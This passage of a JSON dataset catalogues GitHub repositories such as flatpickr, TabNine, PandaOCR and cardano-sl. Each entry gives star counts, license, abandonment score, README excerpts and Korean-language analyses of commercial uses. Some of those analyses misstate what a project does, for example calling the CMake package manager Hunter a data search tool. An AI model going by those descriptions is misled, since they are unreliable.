通过扩展dubbo提供的MonitorService接口来实现对服务的监控，由于官方版本的监控功能比较局限，所以将通过收集各方意见重新开发一套","composite_score":0.3272,"license_safety_tag":"safe"},{"name":"chmln/flatpickr","github_url":"https://github.com/chmln/flatpickr","stars":5,"language":"TypeScript","license":"mit","abandonment_months":22,"description":"# Flatpickr 저장소 분석\n\n## 왜 보물인가\n날짜를 선택하는 기능을 웹사이트에 쉽게 추가할 수 있는 가벼운 도구로, 전 세계 수많은 웹서비스에서 사용되고 있습니다.\n\n## 어디에 쓸 수 있나\n- **예약 시스템 SaaS**: 병원, 미용실, 호텔 예약 플랫폼에서 고객이 날짜를 선택하는 기능 제공\n- **전자상거래 내부 도구**: 쇼핑몰 관리자가 상","readme_excerpt":"## flatpickr - javascript datetime picker\n[![Actions Status](https://github.com/flatpickr/flatpickr/workflows/GitHub%20Actions/badge.svg)](https://github.com/flatpickr/flatpickr/actions)\n\n[![Coverage](https://coveralls.io/repos/github/chmln/flatpickr/badge.svg?branch=master)](https://coveralls.io/github/chmln/flatpickr)\n[![npm version](https://badge.fury.io/js/flatpickr.svg)](https://www.npmjs.com/package/flatpickr)\n[![CDNJS](https://img.shields.io/cdnjs/v/flatpickr.svg)](https://cdnjs.com/libraries/flatpickr)\n[![License](https://img.shields.io/badge/license-MIT-blue.svg?style=plastic)](https://raw.githubusercontent.com/flatpickr/flatpickr/master/LICENSE.md)\n\n\n![blue](https://cloud.githubusercontent.com/assets/11352152/14549371/3cbb65da-028d-11e6-976d-a6f63f32061f.PNG)\n![green](https://cloud.githubusercontent.com/assets/11352152/14549373/3cbe975a-028d-11e6-9192-43975f0146da.PNG)\n![confetti](https://cloud.githubusercontent.com/assets/11352152/14549440/de9bf55e-028d-11e6-9271-46782a99efe","composite_score":0.327,"license_safety_tag":"safe"},{"name":"zxqfl/TabNine","github_url":"https://github.com/zxqfl/TabNine","stars":6,"language":"Shell","license":"MIT","abandonment_months":9,"description":"# TabNine 저장소 분석\n\n## 왜 보물인가\n프로그래머가 코드를 입력할 때 자동으로 다음 내용을 예측해주는 AI 도구로, 작업 속도를 크게 높일 수 있는 생산성 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 구독 서비스**: 월 정액을 받고 개발자들에게 AI 코드 자동완성 기능을 제공하는 웹 서비스\n2. **기업 내부 도구**: 회사의 프로","readme_excerpt":"# TabNine\n\nThis is the repository for the backend of [TabNine](https://tabnine.com), the all-language autocompleter.\nThere are no source files here because the backend is closed source.\n\nYou can make feature requests by filing an issue. You are also welcome to make pull requests for changes to the configuration files.\n\n`languages.yml` determines which file extensions are considered part of the same language. (For example, identifiers from `.c` files will be suggested in `.h` files.)\n\n`language_tokenization.json` determines how languages are tokenized. For example, identifiers can contain dashes in Lisp, but not in Java.\n\nIf your feature request is specific to a particular editor's TabNine client, please file an issue in one of these repositories:\n\n- [VS Code](https://github.com/zxqfl/tabnine-vscode)\n- [Sublime Text](https://github.com/zxqfl/tabnine-sublime)\n- [Vim](https://github.com/zxqfl/tabnine-vim)\n- [Atom](https://github.com/zxqfl/tabnine-atom)\n\nYou may be interested in these TabN","composite_score":0.3269,"license_safety_tag":"safe"},{"name":"Popmotion/popmotion","github_url":"https://github.com/Popmotion/popmotion","stars":6,"language":"JavaScript","license":"unknown","abandonment_months":27,"description":"# Popmotion 저장소 분석\n\n## 왜 보물인가\n웹사이트와 앱의 움직임과 애니메이션을 손쉽게 만들어주는 도구로, 사용자 경험을 훨씬 매력적으로 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 대시보드나 분석 도구의 그래프, 차트가 부드럽게 움직이며 나타나도록 해서 전문성 있는 느낌 전달\n2. **내부 업무 도구**: 직원","readme_excerpt":"# <a href=\"https://popmotion.io\"><img src=\"https://user-images.githubusercontent.com/7850794/90245722-80926e80-de33-11ea-9c39-ea6c5b344217.png\" height=\"52\" width=\"243\" alt=\"Popmotion\" /></a>\n\n### The animator's toolbox\n\n[![npm version](https://img.shields.io/npm/v/popmotion.svg?style=flat-square)](https://www.npmjs.com/package/popmotion)\n[![npm downloads](https://img.shields.io/npm/dm/popmotion.svg?style=flat-square)](https://www.npmjs.com/package/popmotion)\n[![Twitter Follow](https://img.shields.io/twitter/follow/popmotionjs.svg?style=social&label=Follow)](http://twitter.com/popmotionjs)\n\nPopmotion is:\n- **Powerful**: It supports keyframe and spring animations for numbers, colors and complex strings.\n- **Low level**: It's designed to be composable and portable into any JavaScript environment, with an eye on worklets in the future.\n- **Stable**: It's written in TypeScript and enjoys over 95% test coverage.\n- **Tiny**: `animate` is just ~4.5kb, and every function is individually importa","composite_score":0.3268,"license_safety_tag":"unknown"},{"name":"miaomiaosoft/PandaOCR","github_url":"https://github.com/miaomiaosoft/PandaOCR","stars":5,"language":"","license":"unknown","abandonment_months":46,"description":"# PandaOCR 보물 분석\n\n## 왜 보물인가\n사진이나 이미지에 있는 글자를 자동으로 읽어주는 기술로, 수작업으로 옮겨 적던 번거로움을 완전히 없앨 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 영수증·명함·서류 스캔 앱으로 구독료 받기\n- **내부 업무 도구**: 회사에서 대량의 종이 서류를 디지털화하는 자동화 솔루션\n- **A","readme_excerpt":"## PandaOCR - 多功能OCR图文识别+翻译+朗读+弹窗+公式+表格+图床+搜图+二维码\n\n<VER：2.72>\n##### 2022-03-16 更新\n\n------------\n# [推荐使用最新的PandaOCR.Pro专业版（点此跳转）](https://github.com/miaomiaosoft/PandaOCR.Pro#下载)\n\n#### 专业版本：\n- 🥇目前全新重构的PandaOCR.Pro专业版已发布，它更快速稳定、接口更丰富、操作更简单，推荐您使用！ [查看PandaOCR.Pro专业版](https://github.com/miaomiaosoft/PandaOCR.Pro)\n- 针对当前普通版的说明：\n- 会继续维护普通版，保留所有接口但不再增加新功能，专业版的版本号之所以从5.x开始，正是考虑到普通版以后还会有更新所以保留了一段版本号。\n- 您可以继续像以往那样免费使用普通版，不用担心推出专业版后导致普通版停用，如果有更高需求可以尝试专业版。\n- 对于捐助的朋友我表示非常感谢，没有你们的支持PandaOCR坚持不了现在，感谢！\n\n------------\n\n#### 特别声明：\n- 本工具一直只在Github发布和更新，目前并没有所谓PandaOCR官网或熊猫OCR官网，从其他网站下载的PandaOCR请自行验证安全性！\n- 目前发现这个免费软件居然被有些可能生活困难的朋友拿到某宝上出售，导致买去用的人反而跑来找我当售后（这不厚道），这太难了，建议买的人找店主解决！\n\n------------\n\n#### 功能介绍：\n\n- 支持识别引擎：搜狗OCR/API+腾讯OCR/API+百度OCR/API+有道OCR/API+阿里OCR/API+京东OCR+华为OCR+网易OCR+讯飞OCR+金山OCR+灵云OCR+飞桨OCR+合合OCR+网校OCR+易道OCR+薪火OCR+必应OCR+SpaceOCR+YandexOCR\n\n- 支持公式识别：微软公式+百度公式API+腾讯公式API+Mathpix公式API+网校公式+阿里公式\n\n- 支持表格识别：有道表格+百度表格API+腾讯表格API+阿里表格/API\n\n- 支持翻译引擎：搜狗翻译/API+腾讯翻译/API+百度翻译/API+有道翻译/API+谷歌翻译+词霸翻译+必应翻译+沪江翻","composite_score":0.3267,"license_safety_tag":"unknown"},{"name":"linuxacademy/content-github-actions-deep-dive-lesson","github_url":"https://github.com/linuxacademy/content-github-actions-deep-dive-lesson","stars":24,"language":"Python","license":"NOASSERTION","abandonment_months":22,"description":"","readme_excerpt":"","composite_score":0.3266,"license_safety_tag":"unknown"},{"name":"howtographql/howtographql","github_url":"https://github.com/howtographql/howtographql","stars":5,"language":"TypeScript","license":"mit","abandonment_months":23,"description":"# howtographql 저장소 분석\n\n## 왜 보물인가\n웹 개발자들이 현대적인 데이터 조회 기술을 배우기 위한 무료 온라인 교과서로, 전 세계 수천 명의 개발자가 이를 통해 새로운 기술을 습득하고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 교육 플랫폼(SaaS)**: 온라인 강의 플랫폼이 이 자료를 활용하여 유료 교육 과정을 만들고 월 구독료","readme_excerpt":"# How to GraphQL 🎓\n\n[How to GraphQL](https://www.howtographql.com) is a fullstack tutorial website to learn all about GraphQL! It was built by [Prisma](https://www.prisma.io?utm_source=htg&utm_medium=readme) and many amazing contributors. All content on the site is completely free and open-source.\n\n[![](http://i.imgur.com/67oYe9q.png)](https://www.howtographql.com)\n\n> **Note**: This repository is currently mostly unmaintained. We are looking for maintainers who can help cleaning up issues and PRs opened by the community. If you are interested in helping out, please [reach out](mailto:burk@prisma.io)!\n\n## Content\n\nThe content for all tutorials is located in the  [`/content`](https://github.com/howtographql/howtographql/tree/master/content) directory. Here is an overview of all the tutorials that are available at the moment:\n\n#### GraphQL\n\n- Fundamentals of GraphQL\n- Advanced GraphQL\n\n#### Frontend\n\n- React & Apollo\n- React & Relay (Out of date)\n- Vue & Apollo (Out of date)\n- Ember & Apo","composite_score":0.3264,"license_safety_tag":"safe"},{"name":"modulz/stitches","github_url":"https://github.com/modulz/stitches","stars":53,"language":"JavaScript","license":"MIT","abandonment_months":16,"description":"# Stitches 저장소 분석\n\n## 왜 보물인가\n웹사이트나 앱의 디자인을 빠르고 일관되게 만들어주는 도구로, 디자이너와 개발자의 협업을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 디자인 시스템을 자동 생성해주는 웹 애플리케이션으로 판매 (월 구독형)\n2. **내부 업무 도구**: 대규모 IT 기업의 여러 팀이 통","readme_excerpt":"Update June 19, 2023: Stitches is no longer actively maintained due to changes in the React ecosystem and maintainer availability. You can <a href=\"https://github.com/stitchesjs/stitches/discussions/1149#discussioncomment-6223090\">read more here</a>.\n\n---\n\n<a href=\"https://stitches.dev\">\n  <img alt=\"stitches\" src=\"https://user-images.githubusercontent.com/372831/112011920-03e21400-8b29-11eb-9c9a-4e14d5a1f575.png\" />\n</a>\n\n# Stitches\n\n## Style your components with confidence\n\nCSS-in-JS with near-zero runtime, SSR, multi-variant support, and a best-in-class developer experience.\n\n#### Stitches Core\n\nFramework-agnostic implementation.\n\n```sh\nnpm install @stitches/core\n```\n\n[Read more](https://github.com/stitchesjs/stitches/tree/main/packages/core)\n\n#### Stitches React\n\nReact wrapper including the `styled` API.\n\n```sh\nnpm install @stitches/react\n```\n\n[Read more](https://github.com/stitchesjs/stitches/tree/main/packages/react)\n\n---\n\n## Documentation\n\nFor full documentation, visit [stitches.","composite_score":0.3264,"license_safety_tag":"safe"},{"name":"ruslo/hunter","github_url":"https://github.com/ruslo/hunter","stars":7,"language":"CMake","license":"bsd-2-clause","abandonment_months":78,"description":"# Hunter 저장소 분석\n\n## 왜 보물인가\n사냥꾼이라는 이름처럼 데이터 속에서 필요한 정보를 빠르게 찾아주는 검색 및 필터링 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **이메일 마케팅 플랫폼**: 고객 데이터베이스에서 특정 조건의 타겟 고객을 자동으로 찾아 캠프레인을 보낼 때\n2. **내부 HR 관리 도구**: 회사 직원 정보 중 특정 부서, 경력","readme_excerpt":"Since 25/08/2019 project is **closed** for public contributions. Please send your pull requests and issues to\n\n- https://github.com/cpp-pm/hunter\n","composite_score":0.3264,"license_safety_tag":"safe"},{"name":"pedrozath/coltrane","github_url":"https://github.com/pedrozath/coltrane","stars":5,"language":"Ruby","license":"MIT","abandonment_months":16,"description":"# Coltrane 저장소 분석\n\n## 왜 보물인가\n음악 이론과 작곡을 자동으로 배우고 연습할 수 있는 도구로, 음악 교육의 진입장벽을 낮출 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **음악 교육 SaaS**: 온라인 음악 레슨 플랫폼에 통합하여 학생들이 음악 이론을 대화형으로 학습하는 서비스\n2. **악기 학습 앱 내부 도구**: 기타, 피아노 배","readme_excerpt":"[![Build Status](https://travis-ci.org/pedrozath/coltrane.svg?branch=master)](https://travis-ci.org/pedrozath/coltrane)\n[![Gem Version](https://badge.fury.io/rb/coltrane.svg)](https://badge.fury.io/rb/coltrane)\n[![Maintainability](https://api.codeclimate.com/v1/badges/e3c8171def8124132380/maintainability)](https://codeclimate.com/github/pedrozath/coltrane/maintainability)\n[![Test Coverage](https://api.codeclimate.com/v1/badges/e3c8171def8124132380/test_coverage)](https://codeclimate.com/github/pedrozath/coltrane/test_coverage)\n\n# Coltrane\n\nA music calculation library/CLI written in Ruby.\n\n![Coltrane](img/coltrane-logo.png)\n\n## CLI (Command Line Interface)\n\n![Screenshot](img/using-coltrane.gif)\n![Screenshot](img/guitar-chords.png)\n\n### Features\n\n* Generate chord progressions for Jazz, Blues, Pop, or custom and see how to play them\n* Seek chords, see their notes and how to play them\n* Seek scales, see their notes and see how to play them\n* Find chords that are common between 2 scales\n* F","composite_score":0.3262,"license_safety_tag":"safe"},{"name":"doggycoder/AndroidOpenGLDemo","github_url":"https://github.com/doggycoder/AndroidOpenGLDemo","stars":5,"language":"Java","license":"unknown","abandonment_months":26,"description":"# AndroidOpenGLDemo 평가 보고서\n\n## 왜 보물인가\n스마트폰 게임이나 3D 앱을 만들 때 필요한 그래픽 기술의 기초를 쉽게 배울 수 있는 교육용 코드 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 안드로이드 앱 개발자를 위한 온라인 교육 플랫폼 - 이 코드를 실습 자료로 활용하여 구독료 징수\n2. **내부 업무 도구*","readme_excerpt":"# 说明\n这是一个Android OpenGLES2.0 从零开始的Demo程序，仅做个人学习OpenGLES的记录，并提供给后来初学者参考。若有相关问题，也非常乐意与大家一起讨论共同进步。\n关于Android OpenGLES2.0学习的博客，也相当于这个Demo的讲解，在CSDN平台上的[链接地址](http://blog.csdn.net/junzia/article/category/6462864)。\n\n# 更新说明\n## 当前内容\n1. 三角形。\n2. 等腰直角三角形。\n3. 彩色三角形。\n4. 正方形的绘制。\n5. 正方体的绘制。\n6. 圆锥的绘制。\n7. 圆柱的绘制\n8. 球体的绘制\n9. 显示图片（纹理贴图初步）\n10. 图片简单的色彩处理\n11. 图片模糊\n12. 放大镜效果\n13. 平移旋转缩放变换\n14. 相机GL预览\n15. 压缩纹理动画\n16. FBO使用\n17. 3D模型《帽子》加载\n18. EGL方式后台处理图像示例\n19. 3D《皮卡丘》模型及纹理加载，光照处理\n20. Camera1API/Camera2API预览到SurfaceView和TextureView\n21. Camera上增加动画\n22. VR 天空盒（球形）效果\n23. 美颜\n24. Blend示例\n25. 光照\n\n## 20180326更新\n1. 增加冯氏光照模型的光照示例\n\n## 20170803更新\n1. 增加Blend示例\n\n## 20170614更新\n1. 增加LookupFilter\n2. 增加美颜及滤镜示例\n\n## 20170523更新\n1. 球形天空盒实现\n2. VR效果\n\n## 20170324更新\n1. 增加Camera上播放动画的示例\n\n## 20170309更新\n1. 增加Texture控制类，支持所有图像流的OpenGLES方式处理\n2. 增加相机示例，5.0前使用Camera1 API预览，5.0后使用Camera2预览\n\n## 20170227更新\n1. 增加相对复杂些的3D模型加载\n2. 为3D模型增加贴图\n3. 给3D模型增加散射光、镜面光及环境光\n\n## 20170218更新\n1. 增加EGL方式后台处理图像示例\n\n## 20170110更新\n1. 增加3D模型加载\n2. 为3D模型增加散射光照（只是为了便于呈现立体效果）\n\n##","composite_score":0.3262,"license_safety_tag":"unknown"},{"name":"open-source-labs/reactime","github_url":"https://github.com/open-source-labs/reactime","stars":6,"language":"TypeScript","license":"MIT","abandonment_months":1,"description":"# Reactime 상용화 분석\n\n## 왜 보물인가\nReact 애플리케이션의 성능 문제를 시각적으로 찾아내는 도구로, 개발자들이 느린 앱을 빠르게 고칠 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 개발사 내부 도구**: 자체 웹 서비스 성능 최적화에 사용하는 유료 플러그인으로 판매\n2. **개발사 구독 서비스**: 월 구독료를 받고 클라","readme_excerpt":"<h1 align=\"center\">\n    <img src =\"./assets/logos/marqueePromoTitle.png\"/>\n    <br>\n  React Performance Tool\n    <br>\n    <a href=\"https://osawards.com/react/\">🏆 Nominated for React Open Source Awards 2020</a>\n  <br>\n</h1>\n\n<h4 align=\"center\">A powerful Chrome extension that enhances React development with time-travel debugging and advanced performance monitoring</h4>\n\n<h4 align=\"center\"><a href=\"https://medium.com/@elliesimens/reactime-reimagined-a-major-leap-forward-in-react-debugging-7b76a0a66f42\">Read our Medium Article</a> to learn more about Reactime’s behind-the-scenes and development process!</h4>\n<br>\n\n<p align=\"center\">\n  <a href=\"https://chrome.google.com/webstore/detail/reactime/cgibknllccemdnfhfpmjhffpjfeidjga\">\n    <img src=\"https://img.shields.io/chrome-web-store/v/cgibknllccemdnfhfpmjhffpjfeidjga\" alt=\"Chrome Web Store\" />\n  </a>\n  <a href=\"https://chrome.google.com/webstore/detail/reactime/cgibknllccemdnfhfpmjhffpjfeidjga\">\n    <img src=\"https://img.shields.io/chrome-w","composite_score":0.326,"license_safety_tag":"safe"},{"name":"XifengGuo/CapsNet-Keras","github_url":"https://github.com/XifengGuo/CapsNet-Keras","stars":10,"language":"Python","license":"mit","abandonment_months":73,"description":"# CapsNet-Keras 상용화 분석\n\n## 왜 보물인가\n이미지 인식 분야에서 기존 방식보다 더 정확하고 효율적인 신경망 구조를 제공하므로, 시각 데이터가 필요한 모든 산업에서 핵심 기술로 활용될 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 의료 영상 진단 SaaS**\n- X-ray, CT 스캔 등 의료 이미지 자동 분석 플랫폼\n- 병원과 진단 ","readme_excerpt":"# CapsNet-Keras\n[![License](https://img.shields.io/github/license/mashape/apistatus.svg?maxAge=2592000)](https://github.com/XifengGuo/CapsNet-Keras/blob/master/LICENSE)\n\nA Keras (branch [tf2.2](https://github.com/XifengGuo/CapsNet-Keras/tree/tf2.2) supports TensorFlow 2) implementation of CapsNet in the paper:   \n[Sara Sabour, Nicholas Frosst, Geoffrey E Hinton. Dynamic Routing Between Capsules. NIPS 2017](https://arxiv.org/abs/1710.09829)   \nThe current `average test error = 0.34%` and `best test error = 0.30%`.   \n \n**Differences with the paper:**   \n- We use the learning rate decay with `decay factor = 0.9` and `step = 1 epoch`,    \nwhile the paper did not give the detailed parameters (or they didn't use it?).\n- We only report the test errors after `50 epochs` training.   \nIn the paper, I suppose they trained for `1250 epochs` according to Figure A.1?\nSounds crazy, maybe I misunderstood.\n- We use MSE (mean squared error) as the reconstruction loss and \nthe coefficient for the loss i","composite_score":0.326,"license_safety_tag":"safe"},{"name":"cotowari/cotowari","github_url":"https://github.com/cotowari/cotowari","stars":34,"language":"V","license":"MPL-2.0","abandonment_months":16,"description":"# cotowari/cotowari 분석 보고서\n\n## 왜 보물인가\n작은 규모지만 최근까지 활발히 유지보수되고 있는 오픈소스 프로젝트로, 실제 사용자 수요가 있는 틈새 솔루션일 가능성이 높습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 이 기술을 기반으로 한 클라우드 서비스를 월 구독 형태로 판매\n2. **내부 업무 도구**: 대형 기업의","readme_excerpt":"<div align=\"center\">\n  <img width=\"200\" src=\"https://raw.githubusercontent.com/cotowali/design/main/assets/cotowali.svg?sanitize=true\">\n  <h1>Cotowali</h1>\n  <p>A statically typed scripting language that transpile into POSIX sh</p>\n  <p><a href=\"https://cotowali.org/\" ref=\"nofollow\" target=\"_blank\">Website</a></p>\n  <p>\n    <a href=\"http://mozilla.org/MPL/2.0/\" rel=\"nofollow\">\n      <img  alt=\"License: MPL 2.0\" src=\"https://img.shields.io/badge/License-MPL%202.0-blue.svg?style=flat-square\">\n    <a href=\"https://discord.com/invite/nwEad5dNYg\" rel=\"nofollow\">\n      <img alt=\"Join Cotowali Discord\" src=https://img.shields.io/static/v1?label=Discord&logo=discord&logoColor=white&message=Join&color=&style=flat-square\n    </a>\n  </p>\n</div>\n\n## Concepts of Cotowali\n\n- Outputs shell script that is fully compliant with POSIX standards.\n- Simple syntax.\n- Simple static type system.\n- Syntax for shell specific feature like pipe and redirection.\n\n## Example\n\n```v\nfn fib(n: int): int {\n  if n < 2 {","composite_score":0.3257,"license_safety_tag":"unknown"},{"name":"trello/RxLifecycle","github_url":"https://github.com/trello/RxLifecycle","stars":8,"language":"Java","license":"apache-2.0","abandonment_months":39,"description":"# RxLifecycle 상용화 분석\n\n## 왜 보물인가\n모바일 앱이 예기치 않게 종료될 때 발생하는 오류를 자동으로 방지해주는 기술로, 앱 개발사들의 골치 아픈 문제를 근본적으로 해결합니다.\n\n## 어디에 쓸 수 있나\n1. **모바일 앱 개발 플랫폼**: 이 기술을 내장하여 개발사들이 더 안정적인 앱을 쉽게 만들도록 지원하는 SaaS\n2. **앱 품질 관","readme_excerpt":"# RxLifecycle\n\nThis library allows one to automatically complete sequences based on a second lifecycle stream.\n\nThis capability is useful in Android, where incomplete subscriptions can cause memory leaks.\n\n## Usage\n\nYou must start with an `Observable<T>` representing a lifecycle stream. Then you use `RxLifecycle` to bind\na sequence to that lifecycle.\n\nYou can bind when the lifecycle emits anything:\n\n```java\nmyObservable\n    .compose(RxLifecycle.bind(lifecycle))\n    .subscribe();\n```\n\nOr you can bind to when a specific lifecyle event occurs:\n\n```java\nmyObservable\n    .compose(RxLifecycle.bindUntilEvent(lifecycle, ActivityEvent.DESTROY))\n    .subscribe();\n```\n\nAlternatively, you can let RxLifecycle determine the appropriate time to end the sequence:\n\n```java\nmyObservable\n    .compose(RxLifecycleAndroid.bindActivity(lifecycle))\n    .subscribe();\n```\n\nIt assumes you want to end the sequence in the opposing lifecycle event - e.g., if subscribing during `START`, it will\nterminate on `STOP`. ","composite_score":0.3256,"license_safety_tag":"safe"},{"name":"imfly/bitcoin-on-nodejs","github_url":"https://github.com/imfly/bitcoin-on-nodejs","stars":5,"language":"JavaScript","license":"unknown","abandonment_months":39,"description":"# Bitcoin on Node.js 저장소 분석\n\n## 왜 보물인가\nNode.js로 비트코인 거래를 직접 처리할 수 있는 도구로, 암호화폐 관련 서비스를 만드는 개발자들이 필요로 하는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n- **암호화폐 거래 플랫폼**: 사용자가 비트코인을 사고팔 수 있는 웹 서비스\n- **자동 송금 시스템**: 기업에서 비트코인","readme_excerpt":"《Node.js区块链开发》\n===================\n\n**【注】感谢小伙伴们的关注，亿书已经全新升级，本书内容也即将更新完成，欢迎大家收藏，分享给需要的人！**\n\n交流请加入中国区块链俱乐部(群如果过期，可以加小助手，拉您进群，记得备注口令：进俱乐部）：\n\n<div>\n<img src=\"./styles/images/third/club.png\" alt=\"中国区块链俱乐部\" height=\"300px\">\n<img src=\"./styles/images/third/helper.png\" alt=\"小助手\" height=\"300px\">\n</div>\n\n## 说明\n\n本文档是基于旧版代码，书中区块链程序已经迭代升级为 [DDN 企业级区块链 v3.0](https://github.com/ddnlink/ddn) 。基于 DDN企业级区块链 的应用开发教学平台即将上线，欢迎加群学习交流！\n\n关于 DDN Blockchain v3.0: <https://github.com/ddnlink/ddn>，请动动您的小手，点击**star**收藏起来~~\n\n\n> “做自己喜欢、擅长、有价值的事情是成功的开端”，欢迎加入这个温馨的大家庭，一起搞事情！\n\n## 反馈\n\n有什么意见或建议，请通过下面的反馈链接，给我反馈\n\n反馈地址：<https://github.com/imfly/blockchain-on-nodejs/issues/1>\n\n\n## 附件\n\n[旧版说明](./README-zh-CN.md)\n","composite_score":0.3255,"license_safety_tag":"unknown"},{"name":"mritd/dockerfile","github_url":"https://github.com/mritd/dockerfile","stars":6,"language":"HTML","license":"mit","abandonment_months":56,"description":"# mritd/dockerfile 프로젝트 분석\n\n## 왜 보물인가\n복잡한 소프트웨어 설치를 자동화하는 설정 모음으로, 개발자들이 같은 작업을 반복하지 않도록 도와줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 기반 애플리케이션 배포 자동화 플랫폼\n2. **내부 업무 도구**: 회사 개발팀의 개발 환경 빠른 구성 및 표준화\n3. ","readme_excerpt":"## Dockerfile\n\n### ⚠️⚠️⚠️ Note: Some build work of docker image is being migrated to earthly, you may not see the update commit in the current repo.\n### ⚠️⚠️⚠️ Earthfile has better scalability and is more convenient for cross-compilation; the migrated dockerfle can be viewed in [https://github.com/mritd/autobuild](https://github.com/mritd/autobuild).\n\n---\n\nThis repository contains some dockerfiles of personally created docker images;\nit will be maintained for long periods if necessary.\n\n**The dockerfile for docker images running in a production environment has been**\n**moved to [ytpay/dockerfiles](https://github.com/ytpay/dockerfiles). such as `all in one build image`、`jdk`、`tomcat`;**\n**dockerfiles for these docker images will be maintained for a long time**\n\n## Stargazers over time\n\n[![Stargazers over time](https://starcharts.herokuapp.com/mritd/dockerfile.svg)](https://starcharts.herokuapp.com/mritd/dockerfile)\n\n## JetBrains\n\nThanks to JetBrains for providing IDE support for this pr","composite_score":0.3255,"license_safety_tag":"safe"},{"name":"input-output-hk/cardano-sl","github_url":"https://github.com/input-output-hk/cardano-sl","stars":26,"language":"Haskell","license":"apache-2.0","abandonment_months":71,"description":"# Cardano-SL 저장소 분석\n\n## 왜 보물인가\n카르다노라는 암호화폐의 핵심 기술을 담은 코드로, 블록체인 기반 금융 시스템을 구축하려는 기관들에게 검증된 기술 기반을 제공할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 블록체인 기반 결제 플랫폼을 제공하는 구독형 서비스로 중소 전자상거래 업체들에게 판매\n2. **내부 업무","readme_excerpt":"# Cardano SL\n\n[![Build status](https://badge.buildkite.com/9c3141d21214ff3ea95d0a38a0e1dab59b206159d2841dee44.svg?branch=master)](https://buildkite.com/input-output-hk/cardano-sl)\n[![Windows build status](https://ci.appveyor.com/api/projects/status/github/input-output-hk/cardano-sl?branch=master&svg=true)](https://ci.appveyor.com/project/input-output/cardano-sl)\n[![Release](https://img.shields.io/github/release/input-output-hk/cardano-sl.svg)](https://github.com/input-output-hk/cardano-sl/releases)\n\n## What is Cardano SL?\n\n**This codebase is now deprecated in favour of the new Shelley-capable Cardano implementation.**\n\nThe new Cardano implementation consists of more granular components:\n\nLooking for a node?\n  - [cardano-node](https://github.com/input-output-hk/cardano-node)\n\nLooking for an explorer?\n  - [cardano-db-sync](https://github.com/input-output-hk/cardano-db-sync)\n  - [cardano-graphql](https://github.com/input-output-hk/cardano-graphql)\n  - [cardano-rest](https://github.com/inp","composite_score":0.3254,"license_safety_tag":"safe"},{"name":"pannous/tensorflow-speech-recognition","github_url":"https://github.com/pannous/tensorflow-speech-recognition","stars":5,"language":"Python","license":"NOASSERTION","abandonment_months":29,"description":"# pannous/tensorflow-speech-recognition 분석\n\n## 왜 보물인가\n음성을 텍스트로 자동 변환하는 기술로, 콜센터·자막 생성·음성 검색 등 다양한 서비스에 바로 적용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **화상 회의 자동 자막 서비스**: Zoom·Teams처럼 실시간으로 음성을 텍스트로 변환해 청각장애인도 참여 가","readme_excerpt":"# Tensorflow Speech Recognition\nSpeech recognition using google's [tensorflow](https://github.com/tensorflow/tensorflow/) deep learning framework, [sequence-to-sequence](https://www.tensorflow.org/versions/master/tutorials/seq2seq/index.html) neural networks.\n\nReplaces [caffe-speech-recognition](https://github.com/pannous/caffe-speech-recognition), see there for some background.\n\n\n## Update 2024: Use **Whisper** !\n\nThis (relatively) old project is NO LONGER UP TO DATE.  \nThe tensorflow 1.0 used is not compatible anymore and the theory is no longer state of the art either.  \nWe highly recommend you check out and use [whisper](https://github.com/ggerganov/whisper.cpp)\n\n## Update 2020: **Mozilla** released [DeepSpeech](https://github.com/mozilla/DeepSpeech)\nThey achieve good [error rates](http://doyouunderstand.me). Free Speech is in good hands, go *there* if you are an end user.\nFor now *this* project is only maintained for educational purposes.\n\n\n## Ultimate goal\nCreate a decent standal","composite_score":0.3254,"license_safety_tag":"unknown"},{"name":"jagenjo/webglstudio.js","github_url":"https://github.com/jagenjo/webglstudio.js","stars":28,"language":"JavaScript","license":"mit","abandonment_months":71,"description":"","readme_excerpt":"<p align=\"center\">\r\n    <img src=\"https://raw.githubusercontent.com/jagenjo/webglstudio.js/master/press/images/logo.png\" alt=\"WebGLStudio\">\r\n</p>\r\n\r\n# WEBGLSTUDIO IS IN A MIGRATION PROCESS TO A NEW REPO. STAY TUNNED\r\n\r\n# WebGLStudio.js\r\n\r\nWebGLStudio.js is an open-source, browser-based 3D graphics suite. You can edit scenes and materials, design effects and shaders, code behaviours, and share your work - all within a browser using standard web technologies.\r\n\r\nSome important WebGLStudio.js features:\r\n\r\n * A full 3D graphics engine ([LiteScene.js](https://github.com/jagenjo/litescene.js)) that supports multiple lights, shadowmaps, realtime reflections, custom materials, postFX, skinning, animation, and much more.\r\n * An easily extended, component-based system for controlling the rendering pipeline and interaction event hooks \r\n * An easy to use, what you see is what you get (WYSIWYG) editor that provides a single interface for all coding, graph compositing and timeline features.\r\n * A g","composite_score":0.3254,"license_safety_tag":"safe"},{"name":"reactjs/react-router-redux","github_url":"https://github.com/reactjs/react-router-redux","stars":5,"language":"JavaScript","license":"mit","abandonment_months":92,"description":"# React Router Redux 저장소 분석\n\n## 왜 보물인가\n웹 애플리케이션에서 페이지 이동 기능과 데이터 관리를 함께 처리할 수 있는 통합 솔루션입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 대시보드형 프로젝트 관리 도구에서 사용자가 여러 페이지를 이동하며 작업 정보를 일관성 있게 유지\n2. **내부 업무 도구**: 기업 직","readme_excerpt":"# Project Deprecated\n\nThis project is no longer maintained. For your Redux <-> Router syncing needs with React Router 4+, please see one of these libraries instead:\n\n* [connected-react-router](https://github.com/supasate/connected-react-router)\n\n---\n\n⚠️ **This repo is for react-router-redux 4.x, which is only compatible with react-router 2.x and 3.x**\n\n# react-router-redux\n\n[![npm 